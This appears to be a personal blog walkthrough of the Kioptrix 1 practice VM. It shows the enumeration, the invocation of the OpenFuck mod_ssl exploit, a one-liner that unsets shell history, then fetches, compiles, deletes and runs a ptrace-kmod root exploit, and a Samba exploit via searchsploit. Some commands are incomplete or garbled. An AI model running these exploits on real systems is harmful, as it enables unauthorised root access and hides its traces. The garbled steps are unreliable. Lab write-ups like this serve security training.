Kioptrix 1 (K1)

4 min readDec 26, 2021


This machine is name Kioptrix 1. I downloaded my box from the CTM by Heath.

Reference link (Original):,22/

I ran the command ‘netdiscover’ on the kali linux to know the specific IP of Kioptrix (K1).

Started enumerations from the tools like nmap, nikto, and dirbuster.

Enumeration is the key. Found the important stuff on this machine.

Server: Apache/1.3.20 (Unix)

OS: Red Hat Linux (mod_ssl/2.8.4 OpenSSL/0.9.6b).

Googling the exploit for the ‘Red Hat Linux (mod_ssl/2.8.4 OpenSSL/0.9.6b)’.

#Manual Exploitation

There’s a repository on Github where a C program name ‘OpenFuck.c’ can be downloaded and well-detailed instructions to how configure the C program for exploitation. See the images below.

I followed the instructions and it worked well.

The command ‘./(NameOfTheFileYouMade)’ you basically saying run this program.

There are two options you may choose here.



Either of them, it should work. Then include the IP, Port, ‘-c’ and range within ’40 -50'.

Command: ./NameOfTheFileYouMade 0x(includeEither) IP Port -c 40–50

Once you complete there will be a shell‘bash-2.05$’. This shell is not an interactive as we’ve expected. A low privilege user; for this one we need to be on root. Tried the ptrace-kmod command. Unfortunately, this one does not obey since there is no internet access on the machine.

Made a new tab with a downloaded C exploit for higher privilege.


I setup a local host web server with the downloaded file. Basically, when you setup your web server the file has need to be on the same directory. This will allow efficient and accuracy. This should be on another tab.

Command: python3 -m http.server 80

I typed this command under the bash I mentioned earlier.

Command: unset HISTFILE; cd /tmp; wget; gcc -o mahirap ptrace-kmod.c -B /usr/bin; rm ptrace-kmod.c; ./mahirap; \n

#HISTFILE does not store file to a specified directory.

Command: /etc/passwd

You are now root and you can now view details on this system.

#Automation (Using Metasploit Framework):

This method is much easier than the first one.

root@kali: msfconsole

set rhosts IP

rhosts = IP of the device will be compromise / need to have more details or enumerations.

Found out this has a Unix Samba 2.2.1a (as previously we did earlier on the enumeration part).

Search for the searchsploit for exploits, scanners etc.

Command: searchsploit -m multiple/remote/10.c

Once we got the C program (explooit). We need to manually configure it using gcc.

Command: gcc -o samba 10.c

Command: ./samba -b0 IPoftheTargetMachine

I did not include the flag or something here. My goal for here is to have a root access and familiar the INs and OUTs.